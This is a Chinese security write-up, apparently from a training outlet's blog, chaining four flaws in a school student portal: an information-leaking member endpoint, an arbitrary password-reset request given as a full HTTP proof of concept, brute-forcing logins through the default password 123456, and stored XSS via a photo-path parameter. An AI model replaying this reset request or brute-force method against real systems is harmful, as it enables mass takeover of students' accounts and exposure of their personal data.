实战纪实 | 几个有趣的漏洞导致的连锁危害

原创 zbs 掌控安全EDU 2024-04-13 12:00

扫码领资料

获网安教程

本文由掌控安全学院 -zbs投稿

前引：总的来说就是信息泄露+越权+爆破登录+xss这四个漏洞导致的连锁反应，因为他有默认密码123456，所以最终可以重置全校学生的密码，并都植入xss，危害十足。

信息收集：和嘉名童鞋一起测试的，都是他收集的QAQ 主要通过百度贴吧搜集到了默认密码和学号信息，实在是牛皮

漏洞复现：漏洞复现：

漏洞一：某接口没有对权限进行限制导致信息泄露

登录后访问/stu/m/member/list

抓取数据包：

可以看到其他同班同学的个人资料，有学号、电话、邮箱，并且因为默认密码为123456，所以获取其他人的学号后可以登录很多的账号；重要的是，该接口泄露了userid！这在接下来的漏洞二中有着很严重的危害：

第一个接口泄露了同班同学的userid，第二个接口可以通过userid重置密码。第三个漏洞没防爆破，有默认密码可以爆破学号登录很多账号，导致可以重置学校大部分用户的密码

漏洞二：任意用户密码重置123456

危害：只需要登录任一账号获取学生权限，便可以将任意用户的密码重置为默认密码123456：

POC：

POST /stu/m/member/resetPassword HTTP/1.1Host: xxxxCookie: 【登录任意账号的cookie即可】User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0Accept: application/json, text/javascript, /; q=0.01Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 14Origin: xxxxxReferer: xxxxxSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersConnection: close

userId=4841276

漏洞复现：先访问/stu/m/member/resetPassword后抓包

改为post包，加一个参数userId=4841276【userId在漏洞一未授权访问里可以看到，我重置了我测试的账号】

重置成功，恢复为默认密码123456

userid在漏洞一的未授权访问里获取：

比如我们想登录这位07116224的同学账号，未授权访问获取userId=4841566

登录随意一个账号后，构造如下数据包发送

登陆账号为xxxx+学号，默认密码123456

=

登陆成功

漏洞三：登录处无验证码，因为默认密码为123456，所以可爆破用户名漏洞

利用登陆账号为xxxx+学号，默认密码123456，爆破学号

抓取登录数据包：

我这里就爆破后四位数字：

随便测四位数都登陆成功了几百个账号，如果从八位数学号都爆破，估计涉及 成千上万账号；

而且结合漏洞一和漏洞二，可以重置全校的账号为默认密码123456，你说危害大不大

登陆账号涉及支付功能

漏洞四：存储型xss

个人资料上传照片，抓取数据包：

图片路径更新这条数据包—可以更换图片路径参数

漏洞1-3可登录学校百分之八九十的账户，漏洞4可导致同学账户被上存储型xss…